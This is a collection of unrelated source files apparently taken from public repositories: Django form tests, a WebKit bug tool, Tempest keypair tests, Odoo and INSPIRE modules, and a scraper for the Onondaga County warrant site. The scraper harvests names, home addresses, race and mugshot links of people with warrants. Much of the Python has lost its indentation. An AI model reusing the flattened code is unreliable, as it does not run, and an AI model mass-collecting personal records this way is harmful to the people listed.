self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ['2006-01-10'])
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ['', '07:30'])
def test_splitdatetimefield_changed(self):
f = SplitDateTimeField(input_date_formats=['%d/%m/%Y'])
self.assertFalse(f.has_changed(['11/01/2012', '09:18:15'], ['11/01/2012', '09:18:15']))
self.assertTrue(f.has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['2008-05-06', '12:40:00']))
self.assertFalse(f.has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['06/05/2008', '12:40']))
self.assertTrue(f.has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['06/05/2008', '12:41']))
# GenericIPAddressField #######################################################
def test_generic_ipaddress_invalid_arguments(self):
self.assertRaises(ValueError, GenericIPAddressField, protocol="hamster")
self.assertRaises(ValueError, GenericIPAddressField, protocol="ipv4", unpack_ipv4=True)
def test_generic_ipaddress_as_generic(self):
# The edge cases of the IPv6 validation code are not deeply tested
# here, they are covered in the tests for django.utils.ipv6
f = GenericIPAddressField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(f.clean(' 127.0.0.1 '), '127.0.0.1')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '127.0.0.')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '1.2.3.4.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '256.125.1.5')
self.assertEqual(f.clean(' fe80::223:6cff:fe8a:2e8a '), 'fe80::223:6cff:fe8a:2e8a')
self.assertEqual(f.clean(' 2a02::223:6cff:fe8a:2e8a '), '2a02::223:6cff:fe8a:2e8a')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '12345:2:3:4')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3::4')
self.assertRaisesMessage(
ValidationError, "'This is not a valid IPv6 address.'",
f.clean, 'foo::223:6cff:fe8a:2e8a'
)
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3:4:5:6:7:8')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1:2')
def test_generic_ipaddress_as_ipv4_only(self):
f = GenericIPAddressField(protocol="IPv4")
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(f.clean(' 127.0.0.1 '), '127.0.0.1')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, '127.0.0.')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, '1.2.3.4.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, '256.125.1.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, 'fe80::223:6cff:fe8a:2e8a')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 address.'", f.clean, '2a02::223:6cff:fe8a:2e8a')
def test_generic_ipaddress_as_ipv6_only(self):
f = GenericIPAddressField(protocol="IPv6")
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, '127.0.0.1')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, '127.0.0.')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, '1.2.3.4.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv6 address.'", f.clean, '256.125.1.5')
self.assertEqual(f.clean(' fe80::223:6cff:fe8a:2e8a '), 'fe80::223:6cff:fe8a:2e8a')
self.assertEqual(f.clean(' 2a02::223:6cff:fe8a:2e8a '), '2a02::223:6cff:fe8a:2e8a')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '12345:2:3:4')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3::4')
self.assertRaisesMessage(
ValidationError, "'This is not a valid IPv6 address.'",
f.clean, 'foo::223:6cff:fe8a:2e8a'
)
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3:4:5:6:7:8')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1:2')
def test_generic_ipaddress_as_generic_not_required(self):
f = GenericIPAddressField(required=False)
self.assertEqual(f.clean(''), '')
self.assertEqual(f.clean(None), '')
self.assertEqual(f.clean('127.0.0.1'), '127.0.0.1')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '127.0.0.')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '1.2.3.4.5')
self.assertRaisesMessage(ValidationError, "'Enter a valid IPv4 or IPv6 address.'", f.clean, '256.125.1.5')
self.assertEqual(f.clean(' fe80::223:6cff:fe8a:2e8a '), 'fe80::223:6cff:fe8a:2e8a')
self.assertEqual(f.clean(' 2a02::223:6cff:fe8a:2e8a '), '2a02::223:6cff:fe8a:2e8a')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '12345:2:3:4')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3::4')
self.assertRaisesMessage(
ValidationError, "'This is not a valid IPv6 address.'",
f.clean, 'foo::223:6cff:fe8a:2e8a'
)
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1::2:3:4:5:6:7:8')
self.assertRaisesMessage(ValidationError, "'This is not a valid IPv6 address.'", f.clean, '1:2')
def test_generic_ipaddress_normalization(self):
# Test the normalizing code
f = GenericIPAddressField()
self.assertEqual(f.clean(' ::ffff:0a0a:0a0a '), '::ffff:10.10.10.10')
self.assertEqual(f.clean(' ::ffff:10.10.10.10 '), '::ffff:10.10.10.10')
self.assertEqual(f.clean(' 2001:000:a:0000:0:fe:fe:beef '), '2001:0:a::fe:fe:beef')
self.assertEqual(f.clean(' 2001::a:0000:0:fe:fe:beef '), '2001:0:a::fe:fe:beef')
f = GenericIPAddressField(unpack_ipv4=True)
self.assertEqual(f.clean(' ::ffff:0a0a:0a0a'), '10.10.10.10')
# SlugField ###################################################################
def test_slugfield_normalization(self):
f = SlugField()
self.assertEqual(f.clean(' aa-bb-cc '), 'aa-bb-cc')
def test_slugfield_unicode_normalization(self):
f = SlugField(allow_unicode=True)
self.assertEqual(f.clean('a'), 'a')
self.assertEqual(f.clean('1'), '1')
self.assertEqual(f.clean('a1'), 'a1')
self.assertEqual(f.clean('你好'), '你好')
self.assertEqual(f.clean(' 你-好 '), '你-好')
self.assertEqual(f.clean('ıçğüş'), 'ıçğüş')
self.assertEqual(f.clean('foo-ıç-bar'), 'foo-ıç-bar')
# UUIDField ###################################################################
def test_uuidfield_1(self):
field = UUIDField()
value = field.clean('550e8400e29b41d4a716446655440000')
self.assertEqual(value, uuid.UUID('550e8400e29b41d4a716446655440000'))
def test_uuidfield_2(self):
field = UUIDField(required=False)
value = field.clean('')
        self.assertIsNone(value)
def test_uuidfield_3(self):
field = UUIDField()
with self.assertRaises(ValidationError) as cm:
field.clean('550e8400')
self.assertEqual(cm.exception.messages[0], 'Enter a valid UUID.')
def test_uuidfield_4(self):
field = UUIDField()
value = field.prepare_value(uuid.UUID('550e8400e29b41d4a716446655440000'))
self.assertEqual(value, '550e8400e29b41d4a716446655440000')
|
leighpauls/k2cro4 | refs/heads/master | third_party/WebKit/Tools/Scripts/webkitpy/tool/steps/createbug.py | 125 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from webkitpy.tool.steps.abstractstep import AbstractStep
from webkitpy.tool.steps.options import Options
class CreateBug(AbstractStep):
@classmethod
def options(cls):
return AbstractStep.options() + [
Options.cc,
Options.component,
Options.blocks,
]
def run(self, state):
# No need to create a bug if we already have one.
if state.get("bug_id"):
return
cc = self._options.cc
if not cc:
cc = state.get("bug_cc")
blocks = self._options.blocks
if not blocks:
blocks = state.get("bug_blocked")
state["bug_id"] = self._tool.bugs.create_bug(state["bug_title"], state["bug_description"], blocked=blocks, component=self._options.component, cc=cc)
if blocks:
status = self._tool.bugs.fetch_bug(blocks).status()
if status == 'RESOLVED':
self._tool.bugs.reopen_bug(blocks, "Re-opened since this is blocked by bug %s" % state["bug_id"])
|
shinichiba/YamadaLabSkinFrictionR7 | refs/heads/master | mainpyqt4uic.py | 1 | import sys
from PyQt4 import QtGui, uic
class MyWindow(QtGui.QMainWindow):
### functions for the buttons to call
def pressedOnButton(self):
print ("Pressed On!")
def pressedOffButton(self):
print ("Pressed Off!")
def __init__(self):
super(MyWindow, self).__init__()
uic.loadUi('mainwindow.ui', self)
        self.pushButtonOn.clicked.connect(self.pressedOnButton)
        self.pushButtonOff.clicked.connect(self.pressedOffButton)
self.show()
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
window = MyWindow()
sys.exit(app.exec_())
|
rchacon/scofflaw | refs/heads/dev | scrapers/onondaga.py | 1 | """
Scrape Onondaga County warrants.
$ python -m scrapers.onondaga
"""
import re
from bs4 import BeautifulSoup
import requests
from . import BaseScraper
__county__ = 'onondaga'
__scraper__ = 'OnondagaScraper'
BASE_URL = 'http://psi2.ongov.net'
class OnondagaScraper(BaseScraper):
"""Search for warrants in Onondaga County."""
def __init__(self):
"""Initial shared session with cookies."""
self.session = requests.Session()
# Set cookies
url = '{}/AWarrants/app/index.jsp'.format(BASE_URL)
self.session.get(url)
def has_next(self, markup):
m = re.search(r'Page\s(?P<beginning>\d+)\sof\s(?P<end>\d+)', markup)
if not m:
return False
return int(m.group('beginning')) < int(m.group('end'))
def get_list_markup(self, lastname):
"""Get markup with a list of people with warrants."""
data = {
'form1:lastNameInput': lastname,
'form1:button1': 'Submit',
'form1': 'form1'
}
url = '{}/AWarrants/app/index.jsp'.format(BASE_URL)
resp = self.session.post(url, data=data)
if resp.ok:
return resp.text
        raise Exception('Warrant list request failed: HTTP %s' % resp.status_code)
def get_next_list_markup(self, next_page):
data = {
'formWarrantRl:table1:web1__pagerWeb': next_page,
'formWarrantRl:table1:goto1__pagerGoText': next_page,
'formWarrantRl': 'formWarrantRl'
}
url = '{}/AWarrants/app/warrants/awarrantsRl.jsp'.format(BASE_URL)
resp = self.session.post(url, data=data)
if resp.ok:
return resp.text
        raise Exception('Warrant list page request failed: HTTP %s' % resp.status_code)
def get_detail_markup(self, link_target):
"""Get detail markup for an individual with a warrant."""
data = {
'formWarrantRl': 'formWarrantRl',
'__LINK_TARGET__': link_target
}
url = '{}/AWarrants/app/warrants/awarrantsRl.jsp'.format(BASE_URL)
resp = self.session.post(url, data=data)
if resp.ok:
return resp.text
        raise Exception('Warrant detail request failed: HTTP %s' % resp.status_code)
def process_details(self, markup):
"""Process detail markup for an individual."""
soup = BeautifulSoup(markup, 'lxml')
mug_shot = soup.find('img', {'id': 'form1:imageEx1'})
ths = soup.find_all('th', {'valign': 'top'})
for th in ths:
# Find Charges
if th.text == 'Charge(s)':
charges_id = int(th.find_next('span').get('id').split(':')[-1][4:]) + 1
charge_span = soup.find('span', {'id': 'form1:table1:0:text%s' % charges_id})
offense_span = charge_span.find_next('span')
null_span = offense_span.find_next('span')
issued_span = null_span.find_next('span')
court_span = issued_span.find_next('span')
court_building = court_span.find_next('span')
court_table = court_span.find_next('table')
court_addr = court_table.text.replace('\n', '')
phone_match = re.search(r'Phone:\((?P<area>\d{3})\)\s+(?P<prefix>\d{3})-(?P<number>\d{4})', court_addr)
if phone_match:
phone = '{area}-{prefix}-{number}'.format(
area=phone_match.group('area'),
prefix=phone_match.group('prefix'),
number=phone_match.group('number')
)
else:
phone = ''
fax_match = re.search(r'Fax:\((?P<area>\d{3})\)\s+(?P<prefix>\d{3})-(?P<number>\d{4})', court_addr)
if fax_match:
fax = '{area}-{prefix}-{number}'.format(
area=fax_match.group('area'),
prefix=fax_match.group('prefix'),
number=fax_match.group('number')
)
else:
fax = ''
agency_span = court_table.find_next('td', {'valign': 'top'}).find_next('span')
return {
'mugshot': '{}{}'.format(BASE_URL, mug_shot['src']),
'charge': charge_span.text,
'offense': offense_span.text,
'issued': issued_span.text,
'court': {
'name': court_span.text,
'address': court_building.text + ' ' + court_addr[0:court_addr.index('Phone')],
'phone': phone,
'fax': fax
},
'agency': agency_span.text.strip()
}
def process_list(self, markup):
"""Process markup that contains list of people."""
soup = BeautifulSoup(markup, 'lxml')
regex = re.compile('formWarrantRl:table1:[0-9]+:backgroundCheckLnk')
backgroundcheck_links = soup.findAll('a', {'id': regex})
if len(backgroundcheck_links) == 0:
raise Exception('Invalid Markup: {}'.format(markup))
for link in backgroundcheck_links:
surname_span = link.find_next('span')
fname_span = surname_span.find_next('span')
mname_span = fname_span.find_next('span')
detail_markup = self.get_detail_markup(link['id'])
last_name = surname_span.text.strip().replace(',', '')
first_name = fname_span.text.strip()
middle_name = mname_span.text.strip()
name = '{first} {last}'.format(first=first_name, last=last_name)
display_name = '{last}, {first}'.format(first=first_name, last=last_name)
if middle_name:
display_name = display_name + ' {middle}'.format(middle=middle_name)
try:
details = self.process_details(detail_markup)
except Exception as ex:
                print('Error processing details for {}: {}'.format(display_name, ex))
continue
age_span = fname_span.find_next('span').find_next('span').find_next('span')
try:
age = int(age_span.text.strip())
except ValueError:
age = None
street_num_tag = age_span.find_next('span')
street_pred_tag = street_num_tag.find_next('span')
street_name_tag = street_pred_tag.find_next('span')
street_type_tag = street_name_tag.find_next('span')
city_tag = street_type_tag.find_next('span')
race_tag = city_tag.find_next('span')
sex_tag = race_tag.find_next('span')
height_tag = sex_tag.find_next('span')
weight_tag = height_tag.find_next('span')
try:
weight = int(weight_tag.text.strip())
except ValueError:
weight = None
address = '{num} {pred} {name} {type} {city}'.\
format(num=street_num_tag.text.strip(),
pred=street_pred_tag.text.strip(),
name=street_name_tag.text.strip(),
type=street_type_tag.text.strip(),
city=city_tag.text.strip())
yield {
'name': name,
'display_name': display_name,
'last_name': last_name,
'first_name': first_name,
'middle_name': middle_name,
'age': age,
'address': address,
'race': race_tag.text.strip(),
'sex': sex_tag.text.strip(),
'height': height_tag.text.strip(),
'weight': weight,
'warrant': details,
'county': 'onondaga'
}
def run(self, alphabet):
"""Entry Point."""
for a in alphabet:
markup = self.get_list_markup(a)
warrants = self.process_list(markup)
for warrant in warrants:
yield warrant
# Process additional pages
next_page = 0
while self.has_next(markup):
next_page += 1
markup = self.get_next_list_markup(next_page)
next_warrants = self.process_list(markup)
for next_warrant in next_warrants:
yield next_warrant
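if __name__ == '__main__':
    # Hedged driver sketch: run via `python -m scrapers.onondaga` so the
    # relative BaseScraper import above resolves. The surname prefixes
    # below are illustrative assumptions, not part of any real CLI.
    scraper = OnondagaScraper()
    for found in scraper.run(['sm', 'jo']):
        print(found['display_name'])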
|
cisco-openstack/tempest | refs/heads/proposed | tempest/api/compute/keypairs/test_keypairs_v22.py | 2 | # Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute.keypairs import test_keypairs
from tempest.lib.common.utils import data_utils
from tempest.lib import decorators
class KeyPairsV22TestJSON(test_keypairs.KeyPairsV2TestJSON):
min_microversion = '2.2'
max_microversion = 'latest'
def _check_keypair_type(self, keypair, keypair_type):
if keypair_type is None:
keypair_type = 'ssh'
self.assertEqual(keypair_type, keypair['type'])
def _test_keypairs_create_list_show(self, keypair_type=None):
k_name = data_utils.rand_name('keypair')
keypair = self.create_keypair(k_name, keypair_type=keypair_type)
        # Verify that 'type' is present in the version 2.2 keypair create
        # response and that it defaults to 'ssh'.
self._check_keypair_type(keypair, keypair_type)
keypair_detail = self.keypairs_client.show_keypair(k_name)['keypair']
self._check_keypair_type(keypair_detail, keypair_type)
fetched_list = self.keypairs_client.list_keypairs()['keypairs']
for keypair in fetched_list:
            # Verify that 'type' is present in the version 2.2 keypair list
            # response and that it defaults to 'ssh'.
if keypair['keypair']['name'] == k_name:
self._check_keypair_type(keypair['keypair'], keypair_type)
@decorators.idempotent_id('8726fa85-7f98-4b20-af9e-f710a4f3391c')
def test_keypairsv22_create_list_show(self):
self._test_keypairs_create_list_show()
@decorators.idempotent_id('89d59d43-f735-441a-abcf-0601727f47b6')
def test_keypairsv22_create_list_show_with_type(self):
keypair_type = 'x509'
self._test_keypairs_create_list_show(keypair_type=keypair_type)
|
DirtyUnicorns/android_external_chromium_org | refs/heads/lollipop | tools/telemetry/telemetry/web_components/web_component_unittest.py | 45 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import StringIO
import unittest
from telemetry.web_components import web_component
class SimpleWebComponent(web_component.WebComponent):
def __init__(self):
super(SimpleWebComponent, self).__init__(
tvcm_module_name='telemetry.web_components.viewer_unittest_data',
js_class_name='telemetry.web_components.SimpleWebComponent',
data_binding_property='dataToView')
def WriteDataToFileAsJson(self, f):
f.write("1\n")
class WebComponentTests(unittest.TestCase):
def testForSmoke(self):
v = SimpleWebComponent()
f = StringIO.StringIO()
v.WriteWebComponentToFile(f)
def testRead(self):
v = SimpleWebComponent()
f = StringIO.StringIO()
v.WriteWebComponentToFile(f)
f.seek(0)
data = SimpleWebComponent.ReadDataObjectFromWebComponentFile(f)
    self.assertEqual(data, 1)
|
rubencabrera/odoo | refs/heads/8.0 | openerp/addons/base/ir/ir_exports.py | 338 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields,osv
class ir_exports(osv.osv):
_name = "ir.exports"
_order = 'name'
_columns = {
'name': fields.char('Export Name'),
'resource': fields.char('Resource', select=True),
'export_fields': fields.one2many('ir.exports.line', 'export_id',
'Export ID', copy=True),
}
class ir_exports_line(osv.osv):
_name = 'ir.exports.line'
_order = 'id'
_columns = {
'name': fields.char('Field Name'),
'export_id': fields.many2one('ir.exports', 'Export', select=True, ondelete='cascade'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
gannetson/django | refs/heads/master | django/contrib/contenttypes/forms.py | 376 | from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.forms import ModelForm, modelformset_factory
from django.forms.models import BaseModelFormSet
class BaseGenericInlineFormSet(BaseModelFormSet):
"""
A formset for generic inline objects to a parent.
"""
def __init__(self, data=None, files=None, instance=None, save_as_new=None,
prefix=None, queryset=None, **kwargs):
opts = self.model._meta
self.instance = instance
self.rel_name = '-'.join((
opts.app_label, opts.model_name,
self.ct_field.name, self.ct_fk_field.name,
))
if self.instance is None or self.instance.pk is None:
qs = self.model._default_manager.none()
else:
if queryset is None:
queryset = self.model._default_manager
qs = queryset.filter(**{
self.ct_field.name: ContentType.objects.get_for_model(
self.instance, for_concrete_model=self.for_concrete_model),
self.ct_fk_field.name: self.instance.pk,
})
super(BaseGenericInlineFormSet, self).__init__(
queryset=qs, data=data, files=files,
prefix=prefix,
**kwargs
)
@classmethod
def get_default_prefix(cls):
opts = cls.model._meta
return '-'.join(
(opts.app_label, opts.model_name,
cls.ct_field.name, cls.ct_fk_field.name)
)
def save_new(self, form, commit=True):
setattr(form.instance, self.ct_field.get_attname(),
ContentType.objects.get_for_model(self.instance).pk)
setattr(form.instance, self.ct_fk_field.get_attname(),
self.instance.pk)
return form.save(commit=commit)
def generic_inlineformset_factory(model, form=ModelForm,
formset=BaseGenericInlineFormSet,
ct_field="content_type", fk_field="object_id",
fields=None, exclude=None,
extra=3, can_order=False, can_delete=True,
max_num=None, formfield_callback=None,
validate_max=False, for_concrete_model=True,
min_num=None, validate_min=False):
"""
Returns a ``GenericInlineFormSet`` for the given kwargs.
You must provide ``ct_field`` and ``fk_field`` if they are different from
the defaults ``content_type`` and ``object_id`` respectively.
"""
opts = model._meta
# if there is no field called `ct_field` let the exception propagate
ct_field = opts.get_field(ct_field)
if not isinstance(ct_field, models.ForeignKey) or ct_field.remote_field.model != ContentType:
raise Exception("fk_name '%s' is not a ForeignKey to ContentType" % ct_field)
fk_field = opts.get_field(fk_field) # let the exception propagate
if exclude is not None:
exclude = list(exclude)
exclude.extend([ct_field.name, fk_field.name])
else:
exclude = [ct_field.name, fk_field.name]
FormSet = modelformset_factory(model, form=form,
formfield_callback=formfield_callback,
formset=formset,
extra=extra, can_delete=can_delete, can_order=can_order,
fields=fields, exclude=exclude, max_num=max_num,
validate_max=validate_max, min_num=min_num,
validate_min=validate_min)
FormSet.ct_field = ct_field
FormSet.ct_fk_field = fk_field
FormSet.for_concrete_model = for_concrete_model
return FormSet
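# A hedged usage sketch (``TaggedItem`` and ``bookmark`` are assumed
# illustrative names, not part of this module):
#
#     TaggedItemFormSet = generic_inlineformset_factory(TaggedItem, extra=1)
#     formset = TaggedItemFormSet(instance=bookmark)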
|
opendaylight/netvirt | refs/heads/master | resources/tools/odltools/odltools/mdsal/models/constants.py | 1 | VIF_TYPE_TO_PREFIX = {
'ovs': 'tap',
'vhost_user': 'vhu'
}
VIF_TYPE = 'neutron-binding:vif-type'
IFACE_PARENT = 'odl-interface:parent-interface'
IFTYPE_VLAN = 'iana-if-type:l2vlan'
IFTYPE_TUNNEL = 'iana-if-type:tunnel'
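# Hedged illustration of how these prefixes are commonly combined with a
# neutron port UUID to form a device name (the 11-character truncation is
# an assumption drawn from OpenStack convention, not defined here):
def example_device_name(vif_type, port_uuid):
    prefix = VIF_TYPE_TO_PREFIX.get(vif_type, 'tap')
    return prefix + port_uuid[:11]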
|
dset0x/inspire-next | refs/heads/master | inspire/modules/workflows/workflows/process_record_arxiv.py | 1 | # -*- coding: utf-8 -*-
#
## This file is part of INSPIRE.
## Copyright (C) 2014 CERN.
##
## INSPIRE is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## INSPIRE is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
##
## In applying this license, CERN does not waive the privileges and immunities
## granted to it by virtue of its status as an Intergovernmental Organization
## or submit itself to any jurisdiction.
"""Workflow for processing single arXiv records harvested."""
import collections
from six import string_types
from invenio.modules.workflows.tasks.marcxml_tasks import (
convert_record_to_bibfield,
quick_match_record,
)
from invenio.modules.classifier.tasks.classification import (
classify_paper_with_oaiharvester,
)
from invenio.modules.oaiharvester.tasks.postprocess import (
convert_record_with_repository,
plot_extract,
arxiv_fulltext_download,
refextract,
author_list,
upload_step,
)
from invenio.modules.workflows.tasks.workflows_tasks import log_info
from inspire.modules.workflows.tasks.actions import was_approved
from invenio.modules.workflows.tasks.logic_tasks import (
workflow_if,
workflow_else,
)
from invenio.modules.workflows.definitions import WorkflowBase
from ..tasks.filtering import inspire_filter_custom
class process_record_arxiv(WorkflowBase):
"""Processing workflow for a single arXiv record.
The records have been harvested via oaiharvester.
"""
object_type = "arXiv"
workflow = [
convert_record_with_repository("oaiarXiv2inspire_nofilter.xsl"),
convert_record_to_bibfield,
workflow_if(quick_match_record, True),
[
plot_extract(["latex"]),
arxiv_fulltext_download,
classify_paper_with_oaiharvester(
taxonomy="HEPont",
output_mode="dict",
),
refextract,
author_list,
inspire_filter_custom(fields=["report_number", "arxiv_category"],
custom_widgeted="*",
custom_accepted="gr",
action="inspire_approval"),
workflow_if(was_approved),
[
upload_step,
],
workflow_else,
[
log_info("Record rejected")
]
],
workflow_else,
[
log_info("Record already into database"),
],
]
@staticmethod
def get_title(bwo):
"""Get the title."""
extracted_title = []
record = bwo.get_data()
if hasattr(record, "get") and "title" in record:
if isinstance(record["title"], str):
extracted_title = [record["title"]]
else:
for a_title in record["title"]:
extracted_title.append(record["title"][a_title])
else:
extracted_title = [" No title"]
title_final = ""
for i in extracted_title:
title_final += "{0} ".format(i)
return title_final
@staticmethod
def get_description(bwo):
"""Get the description column part."""
record = bwo.get_data()
from invenio.modules.records.api import Record
try:
identifiers = Record(record.dumps()).persistent_identifiers
final_identifiers = []
for i in identifiers:
final_identifiers.append(i['value'])
except Exception:
if hasattr(record, "get"):
final_identifiers = [
record.get(
"system_number_external", {}
).get("value", 'No ids')
]
else:
final_identifiers = [' No ids']
task_results = bwo.get_tasks_results()
results = []
if 'bibclassify' in task_results:
try:
result = task_results['bibclassify'][0]['result']
fast_mode = result.get('fast_mode', False)
result = result['dict']['complete_output']
result_string = "<strong></br>Bibclassify result:"\
"</br></strong>"\
"Number of Core keywords: \t%s</br>"\
"PACS: \t%s</br>"\
% (len(result['Core keywords']),
len(result['Field codes']))
if fast_mode:
result_string += "(This task run at fast mode"\
" taking into consideration"\
" only the title and the abstract)"
results.append(result_string)
except (KeyError, IndexError):
pass
categories = []
if hasattr(record, "get"):
if 'subject' in record:
lookup = ["subject", "term"]
elif "subject_term":
lookup = ["subject_term", "term"]
else:
lookup = None
if lookup:
primary, secondary = lookup
category_list = record.get(primary, [])
if isinstance(category_list, dict):
category_list = [category_list]
for subject in category_list:
category = subject[secondary]
if len(subject) == 2:
if subject.keys()[1] == secondary:
source_list = subject[subject.keys()[0]]
else:
source_list = subject[subject.keys()[1]]
else:
try:
source_list = subject['source']
except KeyError:
source_list = ""
if source_list.lower() == 'inspire':
categories.append(category)
from flask import render_template
return render_template('workflows/styles/harvesting_record.html',
categories=categories,
identifiers=final_identifiers,
results=results)
@staticmethod
def formatter(bwo, **kwargs):
"""Return a formatted version of the data."""
from invenio.modules.formatter.engine import format_record
data = bwo.get_data()
if not data:
return ''
formatter = kwargs.get("formatter", None)
format = kwargs.get("format", None)
if formatter:
            # A separate formatter is supplied
return formatter(data)
from invenio.modules.records.api import Record
if isinstance(data, collections.Mapping):
            # Dicts are fine on their own, but this may be a SmartJson (record)
try:
data = Record(data.dumps()).legacy_export_as_marc()
except (TypeError, KeyError):
# Maybe not, submission?
return data
if isinstance(data, string_types):
            # It's a string type, let's try to convert
if format:
# We can try formatter!
# If already XML, format_record does not like it.
if format != 'xm':
try:
return format_record(recID=None,
of=format,
xml_record=data)
except TypeError:
# Wrong kind of type
pass
else:
# So, XML then
from xml.dom.minidom import parseString
try:
pretty_data = parseString(data)
return pretty_data.toprettyxml()
except TypeError:
# Probably not proper XML string then
return "Data cannot be parsed: %s" % (data,)
except Exception:
# Some other parsing error
pass
# Just return raw string
return data
if isinstance(data, set):
return list(data)
# Not any of the above types. How juicy!
return data
|
shykes/zerorpc-python | refs/heads/master | zerorpc/patterns.py | 1 | # -*- coding: utf-8 -*-
